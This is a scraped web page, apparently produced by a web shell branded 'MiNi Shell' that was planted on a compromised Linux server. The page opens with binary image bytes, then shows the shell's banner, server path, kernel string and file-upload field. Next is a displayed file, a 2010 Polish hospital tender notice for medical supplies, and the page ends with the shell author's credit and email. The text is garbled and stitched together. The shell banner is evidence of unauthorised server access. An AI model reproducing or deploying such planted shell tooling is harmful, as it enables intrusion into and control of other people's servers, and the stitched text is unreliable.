JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100127/23878-N-2010.html

<p class="kh_header"><b>Poznań: Dostawa  wyrobów  foliowych, pojemników  na  odpady  medyczne,  szpitalnych wyrobów papierowych,  papierów  rejestracyjnych  oraz żeli  do  USG</b><br>
<b>Numer ogłoszenia: 23878 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ginekologiczno-Położniczy Szpital Kliniczny Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu , ul. Polna 33, 60-535 Poznań, woj. wielkopolskie, tel. 061 8419294, faks 061 8419620.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  wyrobów  foliowych, pojemników  na  odpady  medyczne,  szpitalnych wyrobów papierowych,  papierów  rejestracyjnych  oraz żeli  do  USG.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest dostawa  wyrobów  foliowych, pojemników  na  odpady  medyczne,  szpitalnych wyrobów papierowych,  papierów  rejestracyjnych  oraz żeli  do  USG podzielonych  na  części;
1.	Część  nr  1  -  folie
2.	Część  nr  2  -  worki foliowe
3.	Część  nr  3  -  pojemniki na odpady
4.	Część  nr  4  -  pojemniki do utrwalania materiału tkankowego
5.	Część  nr  5  -  pojemniki do moczu niejałowe
6.	Część  nr  6  -  nożyki jednorazowe do golenia
7.	Część  nr  7  -  prześcieradła perforowane i ręczniki celulozowe
8.	Część  nr  8  -  jednorazowe miski nerkowate, wkłady do podsuwaczy, przykrywki do podsuwaczy ( utylizowane w maceratorach )
9.	Część  nr  9  -  worki na zwłoki
10.	Część  nr  10  -  papier  do  KTG
11.	Część  nr  11  -  papier do EKG
12.	Część  nr  12  -  papier do videoprinterów
13.	Część  nr  13  -  papier ( inne )
14.	Część  nr  14  -  żel do USG
15.	Część  nr  15  -  podkład podfoliowany w roli

Szczegółowy  opis  przedmiotu  zamówienia  zawiera  załącznik  nr  1  do  specyfikacji  stanowiący  integralną  jej  część.
Na  podstawie  przepisu  art.  25  ust. 1  pkt. 2  ustawy  w  celu  potwierdzenia,  że oferowane dostawy  odpowiadają wymaganiom określonym przez  Zamawiającego,  Zamawiający  wymaga  przedstawienia  wraz  z  ofertą:
a)	Deklaracji  zgodności  CE  -  dotyczy  wyrobów medycznych
b)	Oświadczenia dotyczącego posiadania atestu  PZH  przez  wyroby foliowe  mające  kontakt  z  żywnością,
c)	Opinii  PZH  w  odniesieniu  do  części  nr  3  i  nr 4.
d)	próbek oferowanych  wyrobów   co  najmniej  po  jednej  sztuce  w  odniesieniu  do  każdej  pozycji  występującej  w  poszczególnych  częściach  zamówienia .  Zamawiający  wymaga  szczegółowego  opisu  próbek  tj. opisu numerem  części  zamówienia  oraz  numerem  pozycji,   do  której  należy  je  przyporządkować.  Próbki  winny  być  umieszczone  w  oddzielnym  opakowaniu  dołączonym  do  oferty  zgodne  z  wykazem  załączonych  do  oferty  próbek  -  załącznik  nr  7 do  specyfikacji,
e)	katalogów  oferowanych  wyrobów ,  w  języku  polskim,  potwierdzających  wymagane  parametry  dla  przedmiotu  zmówienia wraz z opisem części i pozycji zamówienia.
3)	Zamawiający  w  odniesieniu  do  przedmiotu  zamówienia  wymaga:
a)	realizacji  dostaw  w  nieprzekraczalnym  terminie  7  dni,  od  dnia  złożenia  zamówienia  pisemnie  lub  przy  pomocy  faksu,
b)	realizacji  dostaw  na  CITO  zgodnie  z  zadeklarowanym  przez  Wykonawcę  terminem,
c)	oznakowania  wyrobu  medycznego  znakiem  CE,  zgodnie  z ustawą  z  dnia  20  kwietnia  2004 r. o wyrobach medycznych,  


d)	etykiet  wyrobów medycznych zgodnych  z  Rozporządzeniem  Ministra Zdrowia  z  dnia  3  listopada  2004 r.  w  sprawie  wymagań  zasadniczych wyrobów medycznych do różnego przeznaczenia  ( Dz. U. nr 251,  poz. 2514 ).
e)	dostaw  wyrobów  identycznych   z  wyrobami  zaproponowanymi  w  ofercie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6, 19.52.00.00-7, 33.14.16.15-4, 33.72.10.00-0, 33.19.80.00-4, 33.14.10.00-0, 33.92.20.00-9, 22.99.30.00-7, 33.71.15.40-4, 18.11.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O  udzielenie  zamówienia  mogą  ubiegać  się  Wykonawcy,  którzy;  
1)	nie  podlegają  wykluczeniu  na  podstawie  art.  24  ust. 1  ustawy  -  Prawo  zamówień  publicznych.
2)	spełniają  warunki określone  w  art.  22  ust. 1  ustawy  dotyczące;
a)	posiadania  uprawnień  do  wykonywania  określonej  działalności  lub  czynności,  jeżeli  przepisy  prawa  nakładają  obowiązek  ich  posiadania; Zamawiający  nie  wyznacza  szczegółowego  warunku  w  tym  zakresie,
b)	posiadania  wiedzy  i  doświadczenia  tj. wykonali  w  okresie  ostatnich  trzech  lat  przed  upływem  terminu  składania  ofert,  a  jeżeli  okres  prowadzenia  działalności  jest  krótszy  -  w  tym  okresie   dwie  dostawy odpowiadające  swoim  rodzajem  przedmiotowi  zamówienia  i  wartości  każdej   z  nich  nie  mniejszej  niż;
-  25 000 zł brutto  dla  części  nr  1,		7 500 zł brutto  dla  części  nr  2,
-  50 000 zł brutto  dla  części  nr  3,		1 300 zł brutto  dla  części  nr  4,
-  1 400 zł brutto  dla  części  nr  5,		7 000 zł brutto  dla  części  nr  6,
-  20 000 zł brutto  dla  części  nr  7,	 	18 000 zł brutto  dla  części  nr  8,
-  500 zł brutto  dla  części  nr  9,		10 000 zł brutto  dla  części  nr  10,
-  500 zł brutto  dla  części  nr  11,		 2 500 zł brutto  dla  części  nr  12,
-  6 000 zł brutto  dla  części  nr  13,		4 000 zł brutto  dla  części  nr  14,
-  3 000 zł brutto  dla  części  nr  15,		

c)	dysponowania  odpowiednim  potencjałem  technicznym  oraz  osobami  zdolnymi  do  wykonania  zamówienia;  Zamawiający  nie  wyznacza  szczegółowego  warunku  w  tym  zakresie,
d)	sytuacji  ekonomicznej  i  finansowej;  Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.

Ocena  spełniania  warunków dokonana  będzie  na  podstawie  dokumentów  i  oświadczeń  żądanych  w  pkt. 8  specyfikacji  i  przedstawionych  wraz   z  ofertą,  z zastosowaniem  metody  spełnia -nie spełnia.  
	Wykonawca  w  zakresie  wyżej  wskazanym  jest  zobowiązany  wykazać  odpowiednio  nie  później  niż  na  dzień  składania  ofert,  spełnianie  warunków,  o  których  mowa  w  art.  22  ust. 1  (warunek posiadania wiedzy i doświadczenia)  i  brak  podstaw  do  wykluczenia  z  powodu  niespełniania  warunków,  o  których  mowa  w  art. 24  ust. 1  ustawy.



Wykonawca  może  polegać  na  wiedzy  i  doświadczeniu  linnych  podmiotów, niezależnie  od  charakteru  prawnego  łączących  go  z  nimi  stosunków.  Wykonawca  w  takiej  sytuacji  zobowiązany  jest  udowodnić  Zamawiającemu,  iż  będzie  dysponował  zasobami  niezbędnymi  do  realizacji  zamówienia,  w  szczególności  przedstawiając  w  tym  celu  pisemne  zobowiązanie  tych  podmiotów  do  oddania  mu  do  dyspozycji  niezbędnych   zasobów  na  okres  korzystania  z  nich  przy  wykonaniu  zamówienia.
	Wykonawca, który nie wykazał spełniania warunków udziału w  postępowaniu zostaje  wykluczony na  podstawie  art.  24  ust. 2  pkt. 4)  ustawy
Decyzję dotyczącą wykluczenia Wykonawcy z postępowania Zamawiający podejmuje z uwzględnieniem  obowiązków,  o  których  mowa  w  art.  26  ust. 3  ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W  celu  wykazania  braku  podstaw  do  wykluczenia  z  postępowania  o  udzielenie  zamówienia  Wykonawcy  w  okolicznościach,  o  których  mowa  w  art.  24  ust. 1  ustawy  Zamawiający  żąda  następujących  dokumentów;
	1)	oświadczenia  o   braku  podstaw  do  wykluczenia ;  załącznik  nr  5  do  specyfikacji.  
2)	aktualnego  odpisu  z  właściwego  rejestru,  jeżeli  odrębne  przepisy  wymagają  wpisu  do  rejestru,  w  celu  wykazania  braku  podstaw  do  wykluczenia  w  oparciu  o  art.  24  ust.1  pkt. 2  ustawy,  wystawionego  nie  wcześniej  niż  6  miesięcy  przed  upływem  terminu  składania  ofert,  a  w  stosunku  do  osób  fizycznych  oświadczenia  w  zakresie  art.  24  ust. 1  pkt. 2  ustawy;
3)	aktualnego zaświadczenia  właściwego  naczelnika  urzędu  skarbowego  potwierdzającego,  że  wykonawca  nie  zalega  z  opłacaniem  podatków  lub  zaświadczenia,  że  uzyskał  przewidziane  prawem  zwolnienie,  odroczenie  lub  rozłożenie  na  raty  zaległych  płatności  lub  wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu  -  wystawionego  nie  wcześniej  niż  3  miesiące  przed  upływem  terminu  składania  ofert;
4)	aktualnego  zaświadczenia  właściwego  oddziału  Zakładu  Ubezpieczeń  Społecznych  lub  Kasy  Rolniczego  Ubezpieczenia  Społecznego  potwierdzającego,  że  wykonawca  nie  zalega  z  opłacaniem  składek  na  ubezpieczenie  zdrowotne  i  społeczne,  lub  potwierdzenia,  że  uzyskał  przewidziane  prawem  zwolnienie,  odroczenie  lub  rozłożenie  na  raty  zaległych  płatności  lub  wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu  -  wystawionego  nie  wcześniej  niż  3  miesiące  przed  upływem  terminu  składania  ofert;
	W  przypadku  Wykonawców  wspólnie  ubiegających  się  o  udzielenie  zamówienia  w/w  oświadczenie  i    dokumenty  każdy  Wykonawca  składa  oddzielnie.
W  celu  wykazania  spełniania  przez  Wykonawcę  warunków,  o  których  mowa  w  art.  22  ust.  1  ustawy,  których  opis  sposobu  oceny  spełniania  został  dokonany  w  pkt.  7  specyfikacji  Zamawiający  żąda  następujących  dokumentów:
      1)	oświadczenia  o  spełnianiu  warunków  wskazanych  w  art.  22  ust. 1  ustawy  z  dnia  29  stycznia  2004 r. - Prawo  zamówień  publicznych;  załącznik   nr  4  do  specyfikacji.  
2)	
wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych - wg wzoru  załącznika  nr 6 do  specyfikacji  -  dostaw  w  zakresie  niezbędnym  do  wykazania  spełniania  warunku  wiedzy  i  doświadczenia  w  okresie  ostatnich  trzech  lat  przed  upływem  terminu  składania  ofert,  a  jeżeli  okres  prowadzenia  działalności  jest  krótszy -  w  tym  okresie,  z  podaniem  ich wartości, przedmiotu, dat wykonania i  odbiorców,  oraz  załączeniem  dokumentu  potwierdzającego,  że  te  dostawy  zostały  wykonane  lub  są  wykonywane  należycie.

Dokumentami potwierdzającymi należyte wykonanie dostaw mogą być np. referencje, rekomendacje, listy polecające, opinie itp. Z treści w/w dokumentów winno jednoznacznie wynikać, iż dotyczą one przedstawionych w wykazie dostaw .

	W  przypadku  Wykonawców  wspólnie  ubiegających  się  o  udzielenie  zamówienia  w/w  oświadczenie  i    dokumenty  Wykonawcy  składają  wspólnie.
	


	Jeżeli  Wykonawca  wykazując  spełnianie  warunków,  o  których  mowa  w  pkt. 7 ppkt. 2) lit. b specyfikacji  polega  na  zasobach  innych  podmiotów  na  zasadach  określonych  w  art.  26  ust. 2 b  ustawy, a  podmioty  te  będą  brały  udział  w  realizacji części  zamówienia,  Zamawiający  żąda  od  Wykonawcy  przedstawienia  w  odniesieniu  do  tych  podmiotów  dokumentów  wymienionych  w  pkt. 8.1  specyfikacji.

Oświadczenie  o  spełnieniu  warunków  udziału  w  postępowaniu  na  podstawie  art.  44  ustawy;  załącznik  nr  3  do  specyfikacji.

Wykonawcy   mający   siedzibę  lub  miejsce   zamieszkania   poza    terytorium  Rzeczypospolitej   Polskiej     stosują  się  do  przepisów  §  4  Rozporządzenia  Prezesa  Rady  Ministrów  z  dnia  30  grudnia  2009 r. 
( Dz. U.  z  2009 r.  Nr  226,  poz.  1817 ) w  sprawie  rodzajów  dokumentów,  jakich  może  żądać  Zamawiający  od  Wykonawcy,  oraz  form,  w  jakich  te  dokumenty  mogą  być  składane.  

Zasady  składania  oferty  przez  Wykonawców  wspólnie  ubiegających  się  o  udzielenie  zamówienia;
1)	Wykonawcy  są  zobowiązani  ustanowić  Wykonawcę  -  Pełnomocnika  do  reprezentowania  ich  w  postępowaniu  o  udzielenie  zamówienia  albo  do  reprezentowania  ich  w  postępowaniu  i  zawarcia  umowy  stosownie  do  art.  23,  ust. 2  ustawy  -  Prawo  zamówień  publicznych.
2)	Dokument  pełnomocnictwa  musi  być  załączony  do  oferty  i  zawierać  w  szczególności  wskazanie:  postępowania  o  zamówienie  publiczne którego  dotyczy,  Wykonawców  ubiegających  się  wspólnie  o  udzielenie  zamówienia,  ustanowionego  Wykonawcę  -  Pełnomocnika  oraz  zakres  jego  umocowania.
3)	Dokument  pełnomocnictwa  musi  być  podpisany  w  imieniu  wszystkich  Wykonawców  ubiegających  się  wspólnie  o  udzielenie  zamówienia,  w  tym  Wykonawcę  ustanowionego  jako  Pełnomocnika  i  przez  osoby  uprawnione  do  składania  oświadczeń  woli  wymienione  we  właściwym  rejestrze  lub  ewidencji  Wykonawcy.
4)	Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  ponoszą  solidarną  odpowiedzialność  za  wykonanie  umowy.
5)	W  przypadku  wyboru  oferty  Wykonawców  wspólnie  ubiegających  się  o  udzielenie  zamówienia,  Zamawiający   przed  zawarciem  umowy  w  sprawie  zamówienia  publicznego  zażąda  umowy  regulującej współpracę  tych  Wykonawców.

Udział  podwykonawców  w  wykonaniu  zamówienia
1)	Na  podstawie  przepisu   art.  36,  ust.  4  ustawy  Zamawiający  żąda  wskazania   przez     Wykonawcę  w ofercie  części  zamówienia,  której  wykonanie  powierzy  podwykonawcom.  
2)	Zamawiający  nie  określa  w  specyfikacji,  która  część  zamówienia  nie  może  być  powierzona  podwykonawcom.

Wymagane  dokumenty  mogą  mieć  formę  oryginałów  lub  kopii  poświadczonej  za  zgodność  z  oryginałem  przez  Wykonawcę.  
W  przypadku  Wykonawców  wspólnie  ubiegających  się  o  udzielenie  zamówienia  oraz  w  przypadku  podmiotów,  o  których  mowa  w  pkt. 7  i  8  specyfikacji, kopie  dokumentów  dotyczących  odpowiednio  wykonawcy  lub  tych  podmiotów  są  poświadczane  za  zgodność  z  oryginałem  przez  wykonawcę  lub  te  podmioty.
Zamawiający  zażąda  przedstawienia  oryginału  lub  notarialnie  poświadczonej  kopii  dokumentu,  gdy  złożona  kopia  dokumentu  będzie  nieczytelna  lub  wzbudzi  wątpliwość  co  do  jej  prawdziwości.
Dokumenty  sporządzone  w  języku  obcym  są  składane  wraz  z  tłumaczeniem  na  język  polski..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.gpsk.am.poznan.pl/dzp.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego- Dział Zamówień Publicznych, budynek E1, I piętro, pokój 104.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2010 godzina 09:00, miejsce: Siedziba Zamawiającego, Kancelaria Ogółna - pokój nr 317, Budynek wejście D 1..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com